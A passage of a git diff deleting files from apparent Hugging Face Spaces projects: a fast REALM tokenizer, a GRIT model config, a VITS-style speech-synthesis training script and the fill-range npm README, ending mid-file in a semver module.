"https://huggingface.co/google/realm-cc-news-pretrained-encoder/resolve/main/tokenizer.json" - ), - "google/realm-cc-news-pretrained-scorer": ( - "https://huggingface.co/google/realm-cc-news-pretrained-scorer/resolve/main/tokenizer.json" - ), - "google/realm-cc-news-pretrained-openqa": ( - "https://huggingface.co/google/realm-cc-news-pretrained-openqa/aresolve/main/tokenizer.json" - ), - "google/realm-orqa-nq-openqa": ( - "https://huggingface.co/google/realm-orqa-nq-openqa/resolve/main/tokenizer.json" - ), - "google/realm-orqa-nq-reader": ( - "https://huggingface.co/google/realm-orqa-nq-reader/resolve/main/tokenizer.json" - ), - "google/realm-orqa-wq-openqa": ( - "https://huggingface.co/google/realm-orqa-wq-openqa/resolve/main/tokenizer.json" - ), - "google/realm-orqa-wq-reader": ( - "https://huggingface.co/google/realm-orqa-wq-reader/resolve/main/tokenizer.json" - ), - }, -} - -PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = { - "google/realm-cc-news-pretrained-embedder": 512, - "google/realm-cc-news-pretrained-encoder": 512, - "google/realm-cc-news-pretrained-scorer": 512, - "google/realm-cc-news-pretrained-openqa": 512, - "google/realm-orqa-nq-openqa": 512, - "google/realm-orqa-nq-reader": 512, - "google/realm-orqa-wq-openqa": 512, - "google/realm-orqa-wq-reader": 512, -} - -PRETRAINED_INIT_CONFIGURATION = { - "google/realm-cc-news-pretrained-embedder": {"do_lower_case": True}, - "google/realm-cc-news-pretrained-encoder": {"do_lower_case": True}, - "google/realm-cc-news-pretrained-scorer": {"do_lower_case": True}, - "google/realm-cc-news-pretrained-openqa": {"do_lower_case": True}, - "google/realm-orqa-nq-openqa": {"do_lower_case": True}, - "google/realm-orqa-nq-reader": {"do_lower_case": True}, - "google/realm-orqa-wq-openqa": {"do_lower_case": True}, - 
"google/realm-orqa-wq-reader": {"do_lower_case": True}, -} - - -class RealmTokenizerFast(PreTrainedTokenizerFast): - r""" - Construct a "fast" REALM tokenizer (backed by HuggingFace's *tokenizers* library). Based on WordPiece. - - [`RealmTokenizerFast`] is identical to [`BertTokenizerFast`] and runs end-to-end tokenization: punctuation - splitting and wordpiece. - - This tokenizer inherits from [`PreTrainedTokenizerFast`] which contains most of the main methods. Users should - refer to this superclass for more information regarding those methods. - - Args: - vocab_file (`str`): - File containing the vocabulary. - do_lower_case (`bool`, *optional*, defaults to `True`): - Whether or not to lowercase the input when tokenizing. - unk_token (`str`, *optional*, defaults to `"[UNK]"`): - The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this - token instead. - sep_token (`str`, *optional*, defaults to `"[SEP]"`): - The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for - sequence classification or for a text and a question for question answering. It is also used as the last - token of a sequence built with special tokens. - pad_token (`str`, *optional*, defaults to `"[PAD]"`): - The token used for padding, for example when batching sequences of different lengths. - cls_token (`str`, *optional*, defaults to `"[CLS]"`): - The classifier token which is used when doing sequence classification (classification of the whole sequence - instead of per-token classification). It is the first token of the sequence when built with special tokens. - mask_token (`str`, *optional*, defaults to `"[MASK]"`): - The token used for masking values. This is the token used when training this model with masked language - modeling. This is the token which the model will try to predict. - clean_text (`bool`, *optional*, defaults to `True`): - Whether or not to clean the text before tokenization by removing any control characters and replacing all - whitespaces by the classic one. - tokenize_chinese_chars (`bool`, *optional*, defaults to `True`): - Whether or not to tokenize Chinese characters. This should likely be deactivated for Japanese (see [this - issue](https://github.com/huggingface/transformers/issues/328)). - strip_accents (`bool`, *optional*): - Whether or not to strip all accents. If this option is not specified, then it will be determined by the - value for `lowercase` (as in the original BERT). - wordpieces_prefix (`str`, *optional*, defaults to `"##"`): - The prefix for subwords. 
- """ - - vocab_files_names = VOCAB_FILES_NAMES - pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP - pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION - max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES - slow_tokenizer_class = RealmTokenizer - - def __init__( - self, - vocab_file=None, - tokenizer_file=None, - do_lower_case=True, - unk_token="[UNK]", - sep_token="[SEP]", - pad_token="[PAD]", - cls_token="[CLS]", - mask_token="[MASK]", - tokenize_chinese_chars=True, - strip_accents=None, - **kwargs, - ): - super().__init__( - vocab_file, - tokenizer_file=tokenizer_file, - do_lower_case=do_lower_case, - unk_token=unk_token, - sep_token=sep_token, - pad_token=pad_token, - cls_token=cls_token, - mask_token=mask_token, - tokenize_chinese_chars=tokenize_chinese_chars, - strip_accents=strip_accents, - **kwargs, - ) - - normalizer_state = json.loads(self.backend_tokenizer.normalizer.__getstate__()) - if ( - normalizer_state.get("lowercase", do_lower_case) != do_lower_case - or normalizer_state.get("strip_accents", strip_accents) != strip_accents - or normalizer_state.get("handle_chinese_chars", tokenize_chinese_chars) != tokenize_chinese_chars - ): - normalizer_class = getattr(normalizers, normalizer_state.pop("type")) - normalizer_state["lowercase"] = do_lower_case - normalizer_state["strip_accents"] = strip_accents - normalizer_state["handle_chinese_chars"] = tokenize_chinese_chars - self.backend_tokenizer.normalizer = normalizer_class(**normalizer_state) - - self.do_lower_case = do_lower_case - - def batch_encode_candidates(self, text, **kwargs): - r""" - Encode a batch of text or text pair. This method is similar to regular __call__ method but has the following - differences: - - 1. Handle additional num_candidate axis. (batch_size, num_candidates, text) - 2. Always pad the sequences to *max_length*. - 3. Must specify *max_length* in order to stack packs of candidates into a batch. - - - single sequence: `[CLS] X [SEP]` - - pair of sequences: `[CLS] A [SEP] B [SEP]` - - Args: - text (`List[List[str]]`): - The batch of sequences to be encoded. Each sequence must be in this format: (batch_size, - num_candidates, text). - text_pair (`List[List[str]]`, *optional*): - The batch of sequences to be encoded. Each sequence must be in this format: (batch_size, - num_candidates, text). - **kwargs: - Keyword arguments of the __call__ method. - - Returns: - [`BatchEncoding`]: Encoded text or text pair. - - Example: - - ```python - >>> from transformers import RealmTokenizerFast - - >>> # batch_size = 2, num_candidates = 2 - >>> text = [["Hello world!", "Nice to meet you!"], ["The cute cat.", "The adorable dog."]] - - >>> tokenizer = RealmTokenizerFast.from_pretrained("google/realm-cc-news-pretrained-encoder") - >>> tokenized_text = tokenizer.batch_encode_candidates(text, max_length=10, return_tensors="pt") - ```""" - - # Always using a fixed sequence length to encode in order to stack candidates into a batch. 
- kwargs["padding"] = PaddingStrategy.MAX_LENGTH - - batch_text = text - batch_text_pair = kwargs.pop("text_pair", None) - return_tensors = kwargs.pop("return_tensors", None) - - output_data = { - "input_ids": [], - "attention_mask": [], - "token_type_ids": [], - } - - for idx, candidate_text in enumerate(batch_text): - if batch_text_pair is not None: - candidate_text_pair = batch_text_pair[idx] - else: - candidate_text_pair = None - - encoded_candidates = super().__call__(candidate_text, candidate_text_pair, return_tensors=None, **kwargs) - - encoded_input_ids = encoded_candidates.get("input_ids") - encoded_attention_mask = encoded_candidates.get("attention_mask") - encoded_token_type_ids = encoded_candidates.get("token_type_ids") - - if encoded_input_ids is not None: - output_data["input_ids"].append(encoded_input_ids) - if encoded_attention_mask is not None: - output_data["attention_mask"].append(encoded_attention_mask) - if encoded_token_type_ids is not None: - output_data["token_type_ids"].append(encoded_token_type_ids) - - output_data = {key: item for key, item in output_data.items() if len(item) != 0} - - return BatchEncoding(output_data, tensor_type=return_tensors) - - def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None): - """ - Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and - adding special tokens. A REALM sequence has the following format: - - - single sequence: `[CLS] X [SEP]` - - pair of sequences: `[CLS] A [SEP] B [SEP]` - - Args: - token_ids_0 (`List[int]`): - List of IDs to which the special tokens will be added. - token_ids_1 (`List[int]`, *optional*): - Optional second list of IDs for sequence pairs. - - Returns: - `List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens. - """ - output = [self.cls_token_id] + token_ids_0 + [self.sep_token_id] - - if token_ids_1 is not None: - output += token_ids_1 + [self.sep_token_id] - - return output - - def create_token_type_ids_from_sequences( - self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None - ) -> List[int]: - """ - Create a mask from the two sequences passed to be used in a sequence-pair classification task. A REALM sequence - pair mask has the following format: - - ``` - 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 - | first sequence | second sequence | - ``` - - If `token_ids_1` is `None`, this method only returns the first portion of the mask (0s). - - Args: - token_ids_0 (`List[int]`): - List of IDs. - token_ids_1 (`List[int]`, *optional*): - Optional second list of IDs for sequence pairs. - - Returns: - `List[int]`: List of [token type IDs](../glossary#token-type-ids) according to the given sequence(s). 
- """ - sep = [self.sep_token_id] - cls = [self.cls_token_id] - if token_ids_1 is None: - return len(cls + token_ids_0 + sep) * [0] - return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1] - - def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]: - files = self._tokenizer.model.save(save_directory, name=filename_prefix) - return tuple(files) diff --git a/spaces/ynhe/AskAnything/models/grit_src/grit/config.py b/spaces/ynhe/AskAnything/models/grit_src/grit/config.py deleted file mode 100644 index fabe7f0fbe1e41c6eb280f8f7d6ae2e9c4911135..0000000000000000000000000000000000000000 --- a/spaces/ynhe/AskAnything/models/grit_src/grit/config.py +++ /dev/null @@ -1,50 +0,0 @@ -from detectron2.config import CfgNode as CN - - -def add_grit_config(cfg): - _C = cfg - - _C.MODEL.BEAM_SIZE = 1 - _C.MODEL.TRAIN_TASK = ["ObjectDet", "DenseCap"] - _C.MODEL.TEST_TASK = "DenseCap" # This can be varied if the model is jointly trained on multiple tasks - - _C.MODEL.ROI_BOX_HEAD.USE_BIAS = 0.0 # >= 0: not use - _C.MODEL.ROI_BOX_HEAD.MULT_PROPOSAL_SCORE = False - - _C.MODEL.ROI_HEADS.MASK_WEIGHT = 1.0 - _C.MODEL.ROI_HEADS.OBJECT_FEAT_POOLER_RES = 14 - _C.MODEL.ROI_HEADS.SOFT_NMS_ENABLED = False - - # Backbones - _C.MODEL.VIT_LAYERS = 12 - - # Text Decoder - _C.TEXT_DECODER = CN() - _C.TEXT_DECODER.VOCAB_SIZE = 30522 - _C.TEXT_DECODER.HIDDEN_SIZE = 768 - _C.TEXT_DECODER.NUM_LAYERS = 6 - _C.TEXT_DECODER.ATTENTION_HEADS = 12 - _C.TEXT_DECODER.FEEDFORWARD_SIZE = 768 * 4 - - # Multi-dataset dataloader - _C.DATALOADER.DATASET_RATIO = [1, 1] # sample ratio - _C.DATALOADER.DATASET_BS = 1 - _C.DATALOADER.DATASET_INPUT_SIZE = [1024, 1024] - _C.DATALOADER.DATASET_INPUT_SCALE = [(0.1, 2.0), (0.1, 2.0)] - _C.DATALOADER.DATASET_MIN_SIZES = [(640, 800), (640, 800)] - _C.DATALOADER.DATASET_MAX_SIZES = [1333, 1333] - - _C.SOLVER.USE_CUSTOM_SOLVER = True - _C.SOLVER.OPTIMIZER = 'ADAMW' - _C.SOLVER.VIT_LAYER_DECAY = True - _C.SOLVER.VIT_LAYER_DECAY_RATE = 0.7 - - _C.INPUT.CUSTOM_AUG = 'EfficientDetResizeCrop' - _C.INPUT.TRAIN_SIZE = 1024 - _C.INPUT.TEST_SIZE = 1024 - _C.INPUT.SCALE_RANGE = (0.1, 2.) 
- # 'default' for fixed short / long edge - _C.INPUT.TEST_INPUT_TYPE = 'default' - - _C.FIND_UNUSED_PARAM = True - _C.USE_ACT_CHECKPOINT = True \ No newline at end of file diff --git a/spaces/yo2266911/uma_voice/train_ms.py b/spaces/yo2266911/uma_voice/train_ms.py deleted file mode 100644 index 83f19c8c4fe64fd84a3bcb62ed06e673b6833e07..0000000000000000000000000000000000000000 --- a/spaces/yo2266911/uma_voice/train_ms.py +++ /dev/null @@ -1,306 +0,0 @@ -import os -import json -import argparse -import itertools -import math -import torch -from torch import nn, optim -from torch.nn import functional as F -from torch.utils.data import DataLoader -from torch.utils.tensorboard import SummaryWriter -import torch.multiprocessing as mp -import torch.distributed as dist -from torch.nn.parallel import DistributedDataParallel as DDP -from torch.cuda.amp import autocast, GradScaler -from tqdm import tqdm - -import librosa -import logging - -logging.getLogger('numba').setLevel(logging.WARNING) - -import commons -import utils -from data_utils import ( - TextAudioSpeakerLoader, - TextAudioSpeakerCollate, - DistributedBucketSampler -) -from models import ( - SynthesizerTrn, - MultiPeriodDiscriminator, -) -from losses import ( - generator_loss, - discriminator_loss, - feature_loss, - kl_loss -) -from mel_processing import mel_spectrogram_torch, spec_to_mel_torch -from text.symbols import symbols - - -torch.backends.cudnn.benchmark = True -global_step = 0 - - -def main(): - """Assume Single Node Multi GPUs Training Only""" - assert torch.cuda.is_available(), "CPU training is not allowed." - - n_gpus = torch.cuda.device_count() - os.environ['MASTER_ADDR'] = 'localhost' - os.environ['MASTER_PORT'] = '8000' - - hps = utils.get_hparams() - mp.spawn(run, nprocs=n_gpus, args=(n_gpus, hps,)) - - -def run(rank, n_gpus, hps): - global global_step - if rank == 0: - logger = utils.get_logger(hps.model_dir) - logger.info(hps) - utils.check_git_hash(hps.model_dir) - writer = SummaryWriter(log_dir=hps.model_dir) - writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, "eval")) - - dist.init_process_group(backend='nccl', init_method='env://', world_size=n_gpus, rank=rank) - torch.manual_seed(hps.train.seed) - torch.cuda.set_device(rank) - - train_dataset = TextAudioSpeakerLoader(hps.data.training_files, hps.data) - train_sampler = DistributedBucketSampler( - train_dataset, - hps.train.batch_size, - [32,300,400,500,600,700,800,900,1000], - num_replicas=n_gpus, - rank=rank, - shuffle=True) - collate_fn = TextAudioSpeakerCollate() - train_loader = DataLoader(train_dataset, num_workers=0, shuffle=False, pin_memory=True, - collate_fn=collate_fn, batch_sampler=train_sampler) - if rank == 0: - eval_dataset = TextAudioSpeakerLoader(hps.data.validation_files, hps.data) - eval_loader = DataLoader(eval_dataset, num_workers=0, shuffle=False, - batch_size=hps.train.batch_size, pin_memory=True, - drop_last=False, collate_fn=collate_fn) - - net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - n_speakers=hps.data.n_speakers, - **hps.model).cuda(rank) - net_d = MultiPeriodDiscriminator(hps.model.use_spectral_norm).cuda(rank) - optim_g = torch.optim.AdamW( - net_g.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - optim_d = torch.optim.AdamW( - net_d.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - net_g = DDP(net_g, device_ids=[rank]) - net_d = DDP(net_d, device_ids=[rank]) - - try: 
- _, _, _, epoch_str = utils.load_checkpoint(hps.model_dir.strip("./drive/MyDrive\\"), net_g, None) - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "D_*.pth"), net_d, optim_d) - global_step = (epoch_str - 1) * len(train_loader) - except: - epoch_str = 1 - global_step = 0 - - scheduler_g = torch.optim.lr_scheduler.ExponentialLR(optim_g, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - scheduler_d = torch.optim.lr_scheduler.ExponentialLR(optim_d, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - - scaler = GradScaler(enabled=hps.train.fp16_run) - - for epoch in range(epoch_str, hps.train.epochs + 1): - if rank==0: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, eval_loader], logger, [writer, writer_eval]) - else: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, None], None, None) - scheduler_g.step() - scheduler_d.step() - - -def train_and_evaluate(rank, epoch, hps, nets, optims, schedulers, scaler, loaders, logger, writers): - net_g, net_d = nets - optim_g, optim_d = optims - scheduler_g, scheduler_d = schedulers - train_loader, eval_loader = loaders - if writers is not None: - writer, writer_eval = writers - - train_loader.batch_sampler.set_epoch(epoch) - global global_step - - net_g.train() - net_d.train() - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers) in enumerate(tqdm(train_loader)): - x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True) - spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(rank, non_blocking=True) - y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True) - speakers = speakers.cuda(rank, non_blocking=True) - - with autocast(enabled=hps.train.fp16_run): - y_hat, l_length, attn, ids_slice, x_mask, z_mask,\ - (z, z_p, m_p, logs_p, m_q, logs_q) = net_g(x, x_lengths, spec, spec_lengths, speakers) - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_mel = commons.slice_segments(mel, ids_slice, hps.train.segment_size // hps.data.hop_length) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - - y = commons.slice_segments(y, ids_slice * hps.data.hop_length, hps.train.segment_size) # slice - - # Discriminator - y_d_hat_r, y_d_hat_g, _, _ = net_d(y, y_hat.detach()) - with autocast(enabled=False): - loss_disc, losses_disc_r, losses_disc_g = discriminator_loss(y_d_hat_r, y_d_hat_g) - loss_disc_all = loss_disc - optim_d.zero_grad() - scaler.scale(loss_disc_all).backward() - scaler.unscale_(optim_d) - grad_norm_d = commons.clip_grad_value_(net_d.parameters(), None) - scaler.step(optim_d) - - with autocast(enabled=hps.train.fp16_run): - # Generator - y_d_hat_r, y_d_hat_g, fmap_r, fmap_g = net_d(y, y_hat) - with autocast(enabled=False): - loss_dur = torch.sum(l_length.float()) - loss_mel = F.l1_loss(y_mel, y_hat_mel) * hps.train.c_mel - loss_kl = kl_loss(z_p, logs_q, m_p, logs_p, z_mask) * hps.train.c_kl - - loss_fm = feature_loss(fmap_r, fmap_g) - loss_gen, losses_gen = generator_loss(y_d_hat_g) - loss_gen_all = loss_gen + loss_fm + loss_mel + loss_dur + loss_kl - optim_g.zero_grad() - 
scaler.scale(loss_gen_all).backward() - scaler.unscale_(optim_g) - grad_norm_g = commons.clip_grad_value_(net_g.parameters(), None) - scaler.step(optim_g) - scaler.update() - - if rank==0: - if global_step % hps.train.log_interval == 0: - lr = optim_g.param_groups[0]['lr'] - losses = [loss_disc, loss_gen, loss_fm, loss_mel, loss_dur, loss_kl] - logger.info('Train Epoch: {} [{:.0f}%]'.format( - epoch, - 100. * batch_idx / len(train_loader))) - logger.info([x.item() for x in losses] + [global_step, lr]) - - scalar_dict = {"loss/g/total": loss_gen_all, "loss/d/total": loss_disc_all, "learning_rate": lr, "grad_norm_d": grad_norm_d, "grad_norm_g": grad_norm_g} - scalar_dict.update({"loss/g/fm": loss_fm, "loss/g/mel": loss_mel, "loss/g/dur": loss_dur, "loss/g/kl": loss_kl}) - - scalar_dict.update({"loss/g/{}".format(i): v for i, v in enumerate(losses_gen)}) - scalar_dict.update({"loss/d_r/{}".format(i): v for i, v in enumerate(losses_disc_r)}) - scalar_dict.update({"loss/d_g/{}".format(i): v for i, v in enumerate(losses_disc_g)}) - image_dict = { - "slice/mel_org": utils.plot_spectrogram_to_numpy(y_mel[0].data.cpu().numpy()), - "slice/mel_gen": utils.plot_spectrogram_to_numpy(y_hat_mel[0].data.cpu().numpy()), - "all/mel": utils.plot_spectrogram_to_numpy(mel[0].data.cpu().numpy()), - "all/attn": utils.plot_alignment_to_numpy(attn[0,0].data.cpu().numpy()) - } - utils.summarize( - writer=writer, - global_step=global_step, - images=image_dict, - scalars=scalar_dict) - - if global_step % hps.train.eval_interval == 0: - evaluate(hps, net_g, eval_loader, writer_eval) - utils.save_checkpoint(net_g, optim_g, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "G_{}.pth".format(global_step))) - utils.save_checkpoint(net_d, optim_d, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "D_{}.pth".format(global_step))) - old_g=os.path.join(hps.model_dir, "G_{}.pth".format(global_step-2000)) - old_d=os.path.join(hps.model_dir, "D_{}.pth".format(global_step-2000)) - if os.path.exists(old_g): - os.remove(old_g) - if os.path.exists(old_d): - os.remove(old_d) - global_step += 1 - - if rank == 0: - logger.info('====> Epoch: {}'.format(epoch)) - - -def evaluate(hps, generator, eval_loader, writer_eval): - generator.eval() - with torch.no_grad(): - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers) in enumerate(eval_loader): - x, x_lengths = x.cuda(0), x_lengths.cuda(0) - spec, spec_lengths = spec.cuda(0), spec_lengths.cuda(0) - y, y_lengths = y.cuda(0), y_lengths.cuda(0) - speakers = speakers.cuda(0) - - # remove else - x = x[:1] - x_lengths = x_lengths[:1] - spec = spec[:1] - spec_lengths = spec_lengths[:1] - y = y[:1] - y_lengths = y_lengths[:1] - speakers = speakers[:1] - break - y_hat, attn, mask, *_ = generator.module.infer(x, x_lengths, speakers, max_len=1000) - y_hat_lengths = mask.sum([1,2]).long() * hps.data.hop_length - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1).float(), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - image_dict = { - "gen/mel": utils.plot_spectrogram_to_numpy(y_hat_mel[0].cpu().numpy()) - } - audio_dict = { - "gen/audio": y_hat[0,:,:y_hat_lengths[0]] - } - if global_step == 0: - image_dict.update({"gt/mel": utils.plot_spectrogram_to_numpy(mel[0].cpu().numpy())}) 
- audio_dict.update({"gt/audio": y[0,:,:y_lengths[0]]}) - - utils.summarize( - writer=writer_eval, - global_step=global_step, - images=image_dict, - audios=audio_dict, - audio_sampling_rate=hps.data.sampling_rate - ) - generator.train() - - -if __name__ == "__main__": - main() diff --git a/spaces/zhang-wei-jian/docker/node_modules/fill-range/README.md b/spaces/zhang-wei-jian/docker/node_modules/fill-range/README.md deleted file mode 100644 index 8d756fe9016aec005378ea1b61e599d944ffa4d3..0000000000000000000000000000000000000000 --- a/spaces/zhang-wei-jian/docker/node_modules/fill-range/README.md +++ /dev/null @@ -1,237 +0,0 @@ -# fill-range [![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=W8YFZ425KND68) [![NPM version](https://img.shields.io/npm/v/fill-range.svg?style=flat)](https://www.npmjs.com/package/fill-range) [![NPM monthly downloads](https://img.shields.io/npm/dm/fill-range.svg?style=flat)](https://npmjs.org/package/fill-range) [![NPM total downloads](https://img.shields.io/npm/dt/fill-range.svg?style=flat)](https://npmjs.org/package/fill-range) [![Linux Build Status](https://img.shields.io/travis/jonschlinkert/fill-range.svg?style=flat&label=Travis)](https://travis-ci.org/jonschlinkert/fill-range) - -> Fill in a range of numbers or letters, optionally passing an increment or `step` to use, or create a regex-compatible range with `options.toRegex` - -Please consider following this project's author, [Jon Schlinkert](https://github.com/jonschlinkert), and consider starring the project to show your :heart: and support. - -## Install - -Install with [npm](https://www.npmjs.com/): - -```sh -$ npm install --save fill-range -``` - -## Usage - -Expands numbers and letters, optionally using a `step` as the last argument. _(Numbers may be defined as JavaScript numbers or strings)_. - -```js -const fill = require('fill-range'); -// fill(from, to[, step, options]); - -console.log(fill('1', '10')); //=> ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10'] -console.log(fill('1', '10', { toRegex: true })); //=> [1-9]|10 -``` - -**Params** - -* `from`: **{String|Number}** the number or letter to start with -* `to`: **{String|Number}** the number or letter to end with -* `step`: **{String|Number|Object|Function}** Optionally pass a [step](#optionsstep) to use. -* `options`: **{Object|Function}**: See all available [options](#options) - -## Examples - -By default, an array of values is returned. - -**Alphabetical ranges** - -```js -console.log(fill('a', 'e')); //=> ['a', 'b', 'c', 'd', 'e'] -console.log(fill('A', 'E')); //=> [ 'A', 'B', 'C', 'D', 'E' ] -``` - -**Numerical ranges** - -Numbers can be defined as actual numbers or strings. - -```js -console.log(fill(1, 5)); //=> [ 1, 2, 3, 4, 5 ] -console.log(fill('1', '5')); //=> [ 1, 2, 3, 4, 5 ] -``` - -**Negative ranges** - -Numbers can be defined as actual numbers or strings. 
- -```js -console.log(fill('-5', '-1')); //=> [ '-5', '-4', '-3', '-2', '-1' ] -console.log(fill('-5', '5')); //=> [ '-5', '-4', '-3', '-2', '-1', '0', '1', '2', '3', '4', '5' ] -``` - -**Steps (increments)** - -```js -// numerical ranges with increments -console.log(fill('0', '25', 4)); //=> [ '0', '4', '8', '12', '16', '20', '24' ] -console.log(fill('0', '25', 5)); //=> [ '0', '5', '10', '15', '20', '25' ] -console.log(fill('0', '25', 6)); //=> [ '0', '6', '12', '18', '24' ] - -// alphabetical ranges with increments -console.log(fill('a', 'z', 4)); //=> [ 'a', 'e', 'i', 'm', 'q', 'u', 'y' ] -console.log(fill('a', 'z', 5)); //=> [ 'a', 'f', 'k', 'p', 'u', 'z' ] -console.log(fill('a', 'z', 6)); //=> [ 'a', 'g', 'm', 's', 'y' ] -``` - -## Options - -### options.step - -**Type**: `number` (formatted as a string or number) - -**Default**: `undefined` - -**Description**: The increment to use for the range. Can be used with letters or numbers. - -**Example(s)** - -```js -// numbers -console.log(fill('1', '10', 2)); //=> [ '1', '3', '5', '7', '9' ] -console.log(fill('1', '10', 3)); //=> [ '1', '4', '7', '10' ] -console.log(fill('1', '10', 4)); //=> [ '1', '5', '9' ] - -// letters -console.log(fill('a', 'z', 5)); //=> [ 'a', 'f', 'k', 'p', 'u', 'z' ] -console.log(fill('a', 'z', 7)); //=> [ 'a', 'h', 'o', 'v' ] -console.log(fill('a', 'z', 9)); //=> [ 'a', 'j', 's' ] -``` - -### options.strictRanges - -**Type**: `boolean` - -**Default**: `false` - -**Description**: By default, `null` is returned when an invalid range is passed. Enable this option to throw a `RangeError` on invalid ranges. - -**Example(s)** - -The following are all invalid: - -```js -fill('1.1', '2'); // decimals not supported in ranges -fill('a', '2'); // incompatible range values -fill(1, 10, 'foo'); // invalid "step" argument -``` - -### options.stringify - -**Type**: `boolean` - -**Default**: `undefined` - -**Description**: Cast all returned values to strings. By default, integers are returned as numbers. - -**Example(s)** - -```js -console.log(fill(1, 5)); //=> [ 1, 2, 3, 4, 5 ] -console.log(fill(1, 5, { stringify: true })); //=> [ '1', '2', '3', '4', '5' ] -``` - -### options.toRegex - -**Type**: `boolean` - -**Default**: `undefined` - -**Description**: Create a regex-compatible source string, instead of expanding values to an array. - -**Example(s)** - -```js -// alphabetical range -console.log(fill('a', 'e', { toRegex: true })); //=> '[a-e]' -// alphabetical with step -console.log(fill('a', 'z', 3, { toRegex: true })); //=> 'a|d|g|j|m|p|s|v|y' -// numerical range -console.log(fill('1', '100', { toRegex: true })); //=> '[1-9]|[1-9][0-9]|100' -// numerical range with zero padding -console.log(fill('000001', '100000', { toRegex: true })); -//=> '0{5}[1-9]|0{4}[1-9][0-9]|0{3}[1-9][0-9]{2}|0{2}[1-9][0-9]{3}|0[1-9][0-9]{4}|100000' -``` - -### options.transform - -**Type**: `function` - -**Default**: `undefined` - -**Description**: Customize each value in the returned array (or [string](#optionstoRegex)). _(you can also pass this function as the last argument to `fill()`)_. - -**Example(s)** - -```js -// add zero padding -console.log(fill(1, 5, value => String(value).padStart(4, '0'))); -//=> ['0001', '0002', '0003', '0004', '0005'] -``` - -## About - -
-### Contributing - -Pull requests and stars are always welcome. For bugs and feature requests, [please create an issue](../../issues/new). - -
-### Running Tests - -Running and reviewing unit tests is a great way to get familiarized with a library and its API. You can install dependencies and run tests with the following command: - -```sh -$ npm install && npm test -``` - -
-### Building docs - -_(This project's readme.md is generated by [verb](https://github.com/verbose/verb-generate-readme), please don't edit the readme directly. Any changes to the readme must be made in the [.verb.md](.verb.md) readme template.)_ - -To generate the readme, run the following command: - -```sh -$ npm install -g verbose/verb#dev verb-generate-readme && verb -``` -
      - -### Contributors - -| **Commits** | **Contributor** | -| --- | --- | -| 116 | [jonschlinkert](https://github.com/jonschlinkert) | -| 4 | [paulmillr](https://github.com/paulmillr) | -| 2 | [realityking](https://github.com/realityking) | -| 2 | [bluelovers](https://github.com/bluelovers) | -| 1 | [edorivai](https://github.com/edorivai) | -| 1 | [wtgtybhertgeghgtwtg](https://github.com/wtgtybhertgeghgtwtg) | - -### Author - -**Jon Schlinkert** - -* [GitHub Profile](https://github.com/jonschlinkert) -* [Twitter Profile](https://twitter.com/jonschlinkert) -* [LinkedIn Profile](https://linkedin.com/in/jonschlinkert) - -Please consider supporting me on Patreon, or [start your own Patreon page](https://patreon.com/invite/bxpbvm)! - - - - - -### License - -Copyright © 2019, [Jon Schlinkert](https://github.com/jonschlinkert). -Released under the [MIT License](LICENSE). - -*** - -_This file was generated by [verb-generate-readme](https://github.com/verbose/verb-generate-readme), v0.8.0, on April 08, 2019._ \ No newline at end of file diff --git a/spaces/zhang-wei-jian/docker/node_modules/simple-update-notifier/node_modules/semver/functions/prerelease.js b/spaces/zhang-wei-jian/docker/node_modules/simple-update-notifier/node_modules/semver/functions/prerelease.js deleted file mode 100644 index 06aa13248ae65180cce1f2b3567be654c92b467a..0000000000000000000000000000000000000000 --- a/spaces/zhang-wei-jian/docker/node_modules/simple-update-notifier/node_modules/semver/functions/prerelease.js +++ /dev/null @@ -1,6 +0,0 @@ -const parse = require('./parse') -const prerelease = (version, options) => { - const parsed = parse(version, options) - return (parsed && 